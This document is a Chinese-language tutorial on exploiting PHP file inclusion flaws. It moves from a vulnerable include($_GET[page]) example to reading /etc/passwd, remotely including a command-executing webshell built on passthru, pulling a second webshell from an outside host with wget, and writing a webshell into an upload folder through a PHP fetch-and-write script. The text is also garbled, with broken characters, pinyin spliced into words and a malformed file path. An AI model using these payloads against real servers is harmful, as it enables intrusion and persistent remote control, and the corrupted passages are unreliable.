PHP文件包含漏洞原理區(qū)分與使用方法

一、涉及到的危險(xiǎn)函數(shù)〔include(),require()和include_once(),require_once()〕

include() && require()語句:包括并運(yùn)行指定文件。

這兩種結(jié)構(gòu)除了在如何處理失敗之外完全一樣。 include() 產(chǎn)生一個(gè)警告而 require() 則導(dǎo)致一個(gè)致命錯(cuò)誤。 換句話說， 如果你想在遇到丟失文件時(shí)停止處理頁面就用 require()。 include() 就不是這樣， 腳本會(huì)繼續(xù)運(yùn)行。

如果"allow_url_fopen"在 PHP 中被激活（默認(rèn)配置）， 也可以用 URL（通過 HTTP 或者其它支持的封裝協(xié)議）而不是本地文件來指定要被包括的文件。 如果目標(biāo)服務(wù)器將目標(biāo)文件作為 PHP 代碼解釋， 則可以用適用于 HTTP GET 的 URL 請(qǐng)求字符串來向被包括的文件傳遞變量。

詳細(xì)參考：http://www.phpe.net/manual/function.include.php

require_once()�。ΓΑ�include_once()

require_once()和include_once() 語句在腳本執(zhí)行期間包括并運(yùn)行指定文件。 此行為和 require() 語句類似， 唯一區(qū)別是如果該文件中的代碼已經(jīng)被包括了， 則不會(huì)再次包括。 適用于在腳本執(zhí)行期間同一個(gè)文件有可能被包括超過一次的情況下， 你想確保它只被包括一次以避免函數(shù)重定義， 變量重新賦值等問題。

詳細(xì)參考：http://www.phpe.net/manual/function.require-once.php

二、為什么要包含文件

程序員寫程序的時(shí)候， 不喜歡干同樣的事情， 也不喜歡把同樣的代碼（比如一些公用的函數(shù)）寫幾次， 于是就把需要公用的代碼寫在一個(gè)單獨(dú)的文件里面， 比如 share.php， 而后在其它文件進(jìn)行包含調(diào)用。 在php里， 我們就是使用上面列舉的那幾個(gè)函數(shù)來達(dá)到這個(gè)目的的， 它的工作流程：如果你想在 main.php里包含share.php,我將這樣寫include("share.php")就達(dá)到目的， 然后就可以使用share.php中的函數(shù)了， 像這個(gè)寫死需要包含的文件名稱的自然沒有什么問題， 也不會(huì)出現(xiàn)漏洞， 那么問題到底是出在哪里呢？

有的時(shí)候可能不能確定需要包含哪個(gè)文件， 比如先來看下面這個(gè)文件index.php的代碼：

CODE: [Copy to clipboard]

--------------------------------------------------------------------------------

       if ($_GET[page]) {

       include $_GET[page];

       } else {

       include "home.php";

       }

很正常的一段PHP代碼， 它是怎么運(yùn)作的呢？這里面涉及到$_GET的意義， 我就不打算講了（要不又能寫篇HTTP的文章了）， 如果你還不了解GET， POST,等， 那么你需要再Google一些相關(guān)的資料好好補(bǔ)一補(bǔ)了。

上面這段代碼的使用格式可能是這樣的：http://www.520jsj.com/php/index.php?page=main.php或者h(yuǎn)ttp: //www.520jsj.com/php/index.php?page=downloads.php,結(jié)合上面代碼， 簡單說下怎么運(yùn)作的：

1.提交上面這個(gè)URL， 在index.php中就取得這個(gè)page的值（$_GET[page]）。

2.判斷$_GET[page]是不是空， 若不空（這里是main.php）就用include來包含這個(gè)文件。

3.若$_GET[page]空的話就執(zhí)行else， 來include　home.php　這個(gè)文件。

三、為什么會(huì)產(chǎn)生漏洞

你也許要說， 這樣很好呀， 可以按照URL來動(dòng)態(tài)包含文件， 多么方便呀， 怎么產(chǎn)生漏洞的呢？問題的答案是：我們不乖巧， 我們總喜歡和別人不一樣， 我們不會(huì)按照他的鏈接來操作， 我們可能想自己寫想包含（調(diào)用）的文件， 比如我們會(huì)隨便的打入下面這個(gè)URL：http: //www.1steam.cn/php/index.php?page=hello.php。 然后我們的index.php程序就傻傻按照上面我們說得步驟去執(zhí)行：取page為hello.php， 然后去include(hello.php)， 這時(shí)問題出現(xiàn)了， 因?yàn)槲覀儾�沒有hello.php這個(gè)文件， 所以它 include的時(shí)候就會(huì)報(bào)警告， 類似下列信息：

Quote:

Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3

Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3

注意上面的那個(gè)Warning就是找不到我們指定的hello.php文件， 也就是包含不到我們指定路徑的文件；而后面的警告是因?yàn)榍懊鏇]有找到指定文件， 所以包含的時(shí)候就出警告了。

四、怎么利用

上面可以看到， 問題出現(xiàn)了， 那么我們?cè)趺蠢�用這樣的漏洞呢， 利用方法其實(shí)很多， 但是實(shí)質(zhì)上都是差不多的， 我這里說三個(gè)比較常見的利用方法：

1.包含讀出目標(biāo)機(jī)上其它文件

由前面我們可以看到， 由于對(duì)取得的參數(shù)page沒有過濾， 于是我們可以任意指定目標(biāo)主機(jī)上的其它敏感文件， 例如在前面的警告中， 我們可以看到暴露的絕對(duì)路徑(vhost/wwwroot/php/)， 那么我們就可以多次探測來包含其它文件， 比如指定URL為：http://www.520jsj.com/php/index.php?page=./txt.txt可以讀出當(dāng)前路徑下的txt.txt文件， 也可以使用../../進(jìn)行目錄跳轉(zhuǎn)（在沒過濾../的情況下）；也可以直接指定絕對(duì)路徑， 讀取敏感的系統(tǒng)文件， 比如這個(gè)URL：http://www.520jsj.com/php/index.php?page=/etc/passwd， 如果目標(biāo)主機(jī)沒有對(duì)權(quán)限限制的很嚴(yán)格， 或者啟動(dòng)Apache的權(quán)限比較高， 是可以讀出這個(gè)文件內(nèi)容的。 否則就會(huì)得到一個(gè)類似于：open_basedir restriction in effect.的Warning。

2.包含可運(yùn)行的PHP木馬

如果目標(biāo)主機(jī)的"allow_url_fopen"是激活的（默認(rèn)是激活的， 沒幾個(gè)人會(huì)修改）， 我們就可以有更大的利用空間， 我們可以指定其它URL上的一個(gè)包含PHP代碼的webshell來直接運(yùn)行， 比如， 我先寫一段運(yùn)行命令的PHP代碼（加了注釋， 應(yīng)該看得懂）， 如下保存為cmd.txt（后綴不重要， 只要內(nèi)容為PHP格式就可以了）。

CODE: [Copy to clipboard]

--------------------------------------------------------------------------------

if (get_magic_quotes_gpc())

{$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);}　//去掉轉(zhuǎn)義字符（可去掉字符串中的反斜線字符）

ini_set("max_execution_time",0);　//設(shè)定針對(duì)這個(gè)文件的執(zhí)行時(shí)間， 0為不限制.

echo "

1.S.T

";　　　　　　//打印的返回的開始行提示信息

passthru($_REQUEST["cmd"]);　　　//運(yùn)行cmd指定的命令

echo "

1.S.T

";　　　　　　//打印的返回的結(jié)束行提示信息

?>

以上這個(gè)文件的作用就是接受cmd指定的命令， 并調(diào)用passthru函數(shù)執(zhí)行， 把內(nèi)容返回在1.S.T之間。 把這個(gè)文件保存到我們主機(jī)的服務(wù)器上（可以是不支持PHP的主機(jī)）， 只要能通過HTTP訪問到就可以了， 例如地址如下：http://www.520jsj.com/cmd.txt,然后我們就可以在那個(gè)漏洞主機(jī)上構(gòu)造如下URL來利用了：http://www.520jsj.com/php/index.php?page=http://www.1ster.cn/cmd.txt?cmd=ls,其中cmd后面的就是你需要執(zhí)行的命令， 其它常用的命令（以*UNIX為例）如下：

Quote:

ll 列目錄、文件（相當(dāng)于Windows下dir)

pwd 查看當(dāng)前絕對(duì)路徑

id whoami 查看當(dāng)前用戶

wget　下載指定URL的文件

等等其它的， 你主機(jī)去BAIDU找吧， 就不列舉了。

上面的方法就是得到一個(gè)Webshell了（雖然這個(gè)PHP文件不在目標(biāo)機(jī)上， 但是它確實(shí)是個(gè)Webshell， 不是么？呵呵）

3.包含一個(gè)創(chuàng)建文件的PHP文件

也許有的人認(rèn)為還是得到目標(biāo)機(jī)上的一個(gè)真實(shí)的Webshell比較放心， 萬一哪天人家發(fā)現(xiàn)這兒個(gè)包含漏洞修補(bǔ)了， 我們就不能再遠(yuǎn)程包含得到上面的那個(gè)"偽"Webshell了， 不是么？可以理解這個(gè)心態(tài)， 我們繼續(xù)。 得到一個(gè)真實(shí)的Webshell， 我們也說兩種常見的方法：

1)使用wget之類的命令來下載一個(gè)Webshell

這個(gè)比較簡單， 也很常用， 在上面我們得到的那個(gè)偽webshell中， 我們可以執(zhí)行命令， 那么我們也可以調(diào)用系統(tǒng)中的一個(gè)很厲害的角色， wget， 這個(gè)命令的強(qiáng)大你可以google下， 參數(shù)一大堆， 絕對(duì)搞暈?zāi)悖?呵呵， 我們不需要那么復(fù)雜， 我們就使用一個(gè)-O（--output-document=FILE， 把文檔寫到FILE文件中） 就可以了， 呵呵。

前提是你在按照前面的步驟放一個(gè)包含PHP代碼的Webshell在一個(gè)可以通過HTTP或者FTP等可以訪問的地方， 比如：http://www.520jsj.com/1stphp.txt,這個(gè)文件里寫的就是Webshell的內(nèi)容。 然后我們?cè)谇懊娴玫降膫蜽ebshell中執(zhí)行如下的URL：http://www.520jsj.com/php/index.php?page=http://www.520jsj.com/cmd.txt?cmd=wget http://www.1ster.cn/1stphp.txt -O 1stphp.php， 如果當(dāng)前目錄可寫， 就能得到一個(gè)叫做1stphp.php的Webshell了；如果當(dāng)前目錄不可寫， 還需要想其它的辦法。

2）使用文件來創(chuàng)建

前面的wget可能會(huì)遇到當(dāng)前目錄不能寫的情況；或者目標(biāo)主機(jī)禁用了（或者沒裝）這個(gè)命令， 我們又需要變通一下了， 我們可以結(jié)合前面的包含文件漏洞來包含一個(gè)創(chuàng)建文件（寫文件）的PHP腳本， 內(nèi)容如下：

CODE: [Copy to clipboard]

--------------------------------------------------------------------------------

$f=file_get_contents("http://www.520jsj.com/1stphp.txt"); //打開指定路徑的文件流

$ff=fopen(".http://img6.22122511.com/upload/net_2/1st.php","a"); 　　　　//尋找一個(gè)可以的目錄， 創(chuàng)建一個(gè)文件

fwrite ($ff,$f); 　//把前面打開的文件流寫到創(chuàng)建的文件里

fclose($ff); 　　　//關(guān)閉保存文件

?>

還是寫入我們上面用wget下載的那個(gè)php文件， 但是我們改進(jìn)了方法， 用PHP腳本來實(shí)現(xiàn)， 可以使用上面的cmd.php?cmd=ll查找可以寫的目錄， 比如這里的upload， 然后把文件創(chuàng)建在這個(gè)目錄下：.http://img6.22122511.com/upload/net_2/1st.php。 然后就得到我們的Webshell了。